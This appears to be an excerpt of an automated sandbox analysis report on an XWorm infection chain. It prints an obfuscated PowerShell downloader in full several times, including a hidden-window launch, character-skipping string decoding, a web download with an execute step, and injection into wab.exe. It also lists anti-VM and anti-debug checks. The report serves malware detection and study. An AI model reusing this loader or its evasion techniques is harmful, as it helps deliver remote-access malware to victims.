              Source: Yara match File source: 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($galvanotactic)$global:Valmuen = [System.Text.Encoding]::ASCII.GetString($Convolvuluses62)$global:Bottomlessness=$Valmuen.substring($Uncoincident,$Vasiferous)<#optagelsesprver Rigors
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((kiddushes $Udhales $Plankonomi), (Prsentationens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Rebeset = [AppDomain]::CurrentDomain.GetAssemblies()$globa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Poliskestes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Baryts, $false).DefineType($Arbejdsledere, $u
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($galvanotactic)$global:Valmuen = [System.Text.Encoding]::ASCII.GetString($Convolvuluses62)$global:Bottomlessness=$Valmuen.substring($Uncoincident,$Vasiferous)<#optagelsesprver Rigors
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. 
P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. 
P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C1930F05 push eax; retf 3_2_00007FF7C1930F13
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C4E3B0 push eax; retf 12_2_00C4E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_06E30638 push eax; mov dword ptr [esp], ecx 12_2_06E30AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_06E30AAC push eax; mov dword ptr [esp], ecx 12_2_06E30AC4
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22EA0000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 23050000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: 22F30000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4673
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5232
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6866
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3019
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 4485
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5320
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824 Thread sleep count: 6866 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828 Thread sleep count: 3019 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1392 Thread sleep time: -21213755684765971s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1704 Thread sleep count: 4485 > 30
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1704 Thread sleep count: 5320 > 30
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exe File Volume queried: C:\ FullSizeInformation
              Source: Amcache.hve.23.dr Binary or memory string: VMware
              Source: Amcache.hve.23.dr Binary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.23.dr Binary or memory string: vmci.syshbin
              Source: Amcache.hve.23.dr Binary or memory string: VMware, Inc.
              Source: Amcache.hve.23.dr Binary or memory string: VMware20,1hbin@
              Source: Amcache.hve.23.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.23.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.23.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: wab.exe, 0000000F.00000002.3121592482.0000000007558000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3121592482.00000000075B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: Amcache.hve.23.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.23.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.23.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.23.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: powershell.exe, 00000003.00000002.1892417436.000002AD59C83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Amcache.hve.23.dr Binary or memory string: vmci.sys
              Source: Amcache.hve.23.dr Binary or memory string: vmci.syshbin`
              Source: Amcache.hve.23.dr Binary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.23.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.23.dr Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
              Source: Amcache.hve.23.dr Binary or memory string: VMware20,1
              Source: Amcache.hve.23.dr Binary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.23.dr Binary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.23.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.23.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.23.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.23.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.23.dr Binary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.23.dr Binary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.23.dr Binary or memory string: VMware Virtual RAM
              Source: Amcache.hve.23.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.23.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match File source: amsi64_4904.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 4904, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4540000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 32AFAAC
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. 
P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. 
P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronInJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002315D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: q-PING!<Xwormmm>Program Manager<Xwormmm>2019604
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002315D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002315D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: q-PING!<Xwormmm>Program Manager<Xwormmm>2019604Te
              Source: wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2019604
              Source: wab.exe, 0000000F.00000002.3135063808.0000000023157000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.000000002309D000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3135063808.0000000023130000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Managert-
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
